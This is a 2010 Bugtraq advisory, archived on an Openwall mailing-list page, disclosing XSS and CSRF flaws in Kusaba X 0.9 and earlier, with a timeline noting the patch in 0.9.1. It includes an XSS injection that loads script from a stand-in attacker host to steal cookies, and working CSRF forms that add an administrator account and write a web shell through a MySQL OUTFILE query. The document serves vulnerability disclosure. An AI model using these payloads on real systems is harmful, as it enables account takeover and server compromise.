lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20100217224814.12803.qmail@securityfocus.com>
Date: 17 Feb 2010 22:48:14 -0000
From: systemx00@...il.com
To: bugtraq@...urityfocus.com
Subject: Kusaba X <= 0.9 XSS/CSRF vulnerabilities

==========================================
Kusaba X <= 0.9 XSS/CSRF vulnerabilities
==========================================

Kusaba X suffers XSS and CSRF vulnerabilities that would allow an attacker to take over the web application and possibly the entire server (depending on the MySQL configuration).  The XSS vulnerability is not required to exploit the CSRF but makes the proccess very easy.


XSS:
==========================================
The “Reason” field in the report function doesn't sanitize user input.  The input size is limited to 256 characters, (pleanty for exploitation, but not enough for a textwall of CSRF forms).  This can be circumvented by including off-site javascripts, i.e. <script src="http://attacker.com/asdf.js"></script>.  (iframes work too)  The injected script will render and execute when a Moderator or Administrator views the reports.  If a Moderator falls victim, the worst case scenario would be cookie stealing followed by session hijacking and account theft.  If an Administrator were to view the malicious report, much more is possible.  It would be easy to detect the difference and act accordingly, making this attack more effective.
==========================================

CSRF:
==========================================
These run rampent throughout the application.  Here are two of the most severe but there's lots of fun to be had.

1. Add administrative accouts…

<form action="http://example.chan/manage_page.php?action=staff&add" method="POST">
<input name="username" value="user123" />
<input name="password" value="pass123" />
<input name="type" value="1" />
</form>
<script>document.forms[0].submit();</script>

2. Execute MySQL queries…

<form action="http://example.chan/manage_page.php?action=sql" method="POST">
<input name="query" value="SELECT 'your-shell-here' INTO OUTFILE '/path/to/www';" />
</form>
<script>document.forms[0].submit();</script>
===========================================

Feb 9, 2010 - Reported to Kusaba X dev team.
Feb 15, 2010 - Kusaba X 0.9.1 released containing patch.
Feb 17, 2010 - Info released

~~Thanks to Sazpaimon
~~Greetz to the open source community

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ